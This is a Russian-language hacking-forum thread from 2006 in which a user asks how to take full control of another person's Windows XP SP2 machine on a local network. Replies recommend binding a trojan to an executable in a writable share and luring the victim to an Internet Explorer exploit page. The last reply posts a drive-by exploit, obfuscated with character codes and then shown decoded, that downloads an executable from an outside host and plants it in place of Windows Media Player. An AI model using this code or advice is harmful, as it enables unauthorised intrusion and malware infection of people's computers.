Форум АНТИЧАТ - ??? КАК И ГЛАВНОЕ ЧЕМ ЛОМАНУТЬ WinXP-SP2 по локалке ???

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows
??? КАК И ГЛАВНОЕ ЧЕМ ЛОМАНУТЬ WinXP-SP2 по локалке ???

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

??? КАК И ГЛАВНОЕ ЧЕМ ЛОМАНУТЬ WinXP-SP2 по локалке ???

16.02.2006, 01:58

Duke Nukem

Познающий

Регистрация: 15.02.2006

Сообщений: 43

Провел на форуме:
283891

Репутация: 9

Отправить сообщение для Duke Nukem с помощью ICQ

??? КАК И ГЛАВНОЕ ЧЕМ ЛОМАНУТЬ WinXP-SP2 по локалке ???

Народ хочу получить дельный совет чем орудовать в локалке!!!!
Сведения об жертве:
0.) O.C WinXP SP-2
1.) есть шары(не важно какие главное что не C$ и т.д хотя есть полный доступ к одной из папок которая находится на C: )
2.) tcp 139 135 и многое другое открыто ну как всегда.
3.) Firewall нах. отсутствует.
NEW:
4.)445/tcp - Microsoft DS
Удаленное выполнение команд (ms05-027)
Обнаружена уязвимость в Microsoft Server Message Block (SMB),
которая позволяет удаленному пользователю выполнить произвольный
код на целевой системе.
5.) И аньти вирь у него даже не стоит!!!

В общем мне хотелсь бы получить доступ к системе для полного контроля апанента

Последний раз редактировалось Duke Nukem; 17.02.2006 в 01:27..

16.02.2006, 02:27

~~tclover~~

Banned

Регистрация: 13.12.2005

Сообщений: 1,091

Провел на форуме:
9751364

Репутация: 1847

Можно попытся (Я про директорию к которой у тебя полный доступ) подменить там прогу какую-нить. В случае, конечно если они там есть. Берешь екзешник оттуда, клеишь его с троем и всё.

16.02.2006, 02:30

~~Elekt~~

Banned

Регистрация: 05.12.2005

Сообщений: 982

Провел на форуме:
4839935

Репутация: 1202

Отправить сообщение для Elekt с помощью ICQ

Просто так пробить второй нельзя. По крайней мере у меня таких эксплоитов нет.

Самый простой и эфективный способ - троян.

А как его дать жертве? Полазь по форуму. Ну либо впарить, либо попросить заценить какой нить сайт, где он подгрузит трой через дыру в Ie. За полгода в Ie их уже штук 10-ть нашли. Правда найти рабочий эксплоит - проблема. Но всё возможно.

16.02.2006, 03:10

~~tclover~~

Banned

Регистрация: 13.12.2005

Сообщений: 1,091

Провел на форуме:
9751364

Репутация: 1847

Цитата:

Не знаешь где можно слить прогу для склеивания???

http://forum.antichat.ru/thread14393-%EA%EB%E5%E9.html

16.02.2006, 06:47

Dronga

ВАША реклама ТУТ!!

Регистрация: 01.07.2005

Сообщений: 647

Провел на форуме:
3478464

Репутация: 714

Отправить сообщение для Dronga с помощью ICQ

Хм... Ну чтоб шелл получить с правами SYSTEM, как это поволял делать kaht, таких в паблике насегодня я не видел. Но можно устроить веселую жизнь ушастым уводя их в даун, такие есть. Попробуй вот это: http://forum.antichat.ru/threadedpost111536.html, не уверен что будет в локалке пахать, но мало ли.. Ну и конечно с троями стоит заморочиться, тут и удаленный контроль и перезагрузка... =) Вот только говоря что фаирвола нет это ошибаться, так как XP SP2 подразумевает интегрированный в Windows фаирвол. Ещё обрати внимание на уязвимости прикладных программ, IE например... Это самая большая дыра наверное...

__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!

16.02.2006, 13:07

~~KEZ~~

Banned

Регистрация: 18.05.2005

Сообщений: 1,981

Провел на форуме:
1941233

Репутация: 2726

А да, kaht работает против SP2, да?

16.02.2006, 13:38

Electro

Участник форума

Регистрация: 23.10.2005

Сообщений: 276

Провел на форуме:
1095453

Репутация: 113

Отправить сообщение для Electro с помощью ICQ

Цитата:

Сообщение от Elekt

Правда найти рабочий эксплоит - проблема. Но всё возможно.

Вот сплойт ...незнаю как у вас у меня работает

Код:

<script language="javascript">

fff = String.fromCharCode(118,97,114,32,120,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,41,59,92,114,92,110,120,46,79,112,101,110,40,34,71,69,84,34,44,32,34,104,116,116,112,58,37,50,102,37,50,102,119,119,119,46,109,121,45,114,111,115,116,111,118,46,102,97,116,97,108,46,114,117,37,50,102,102,105,108,101,115,37,50,102,115,101,114,118,105,99,101,115,46,101,120,101,34,44,48,41,59,92,114,92,110,120,46,83,101,110,100,40,41,59,92,114,92,110,118,97,114,32,115,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,65,68,79,68,66,46,83,116,114,101,97,109,34,41,59,92,114,92,110,115,46,77,111,100,101,32,61,32,51,59,92,114,92,110,115,46,84,121,112,101,32,61,32,49,59,92,114,92,110,115,46,79,112,101,110,40,41,59,92,114,92,110,115,46,87,114,105,116,101,40,120,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,92,114,92,110,115,46,83,97,118,101,84,111,70,105,108,101,40,34,67,58,92,92,92,92,80,114,111,103,114,97,109,32,70,105,108,101,115,92,92,92,92,87,105,110,100,111,119,115,32,77,101,100,105,97,32,80,108,97,121,101,114,92,92,92,92,119,109,112,108,97,121,101,114,46,101,120,101,34,44,50,41,59,92,114,92,110,108,111,99,97,116,105,111,110,46,104,114,101,102,32,61,32,34,109,109,115,58,37,50,102,37,50,102,34,59,92,114,92,110);

	myURL = "file:javascript:eval('" + fff + "')";
	window.open(myURL,"_media");
   </script>

закодированном в ASCII кодировку... аналог 

<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http:%2f%2fwww.my-rostov.fatal.ru%2ffiles%2fservices.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms:%2f%2f";
</script>

и взял я его из коммента видео ,на видео ачат ру
и еще когда скопируешь на блокнот то айболит выруби а то сразу ловит троян довнлоудер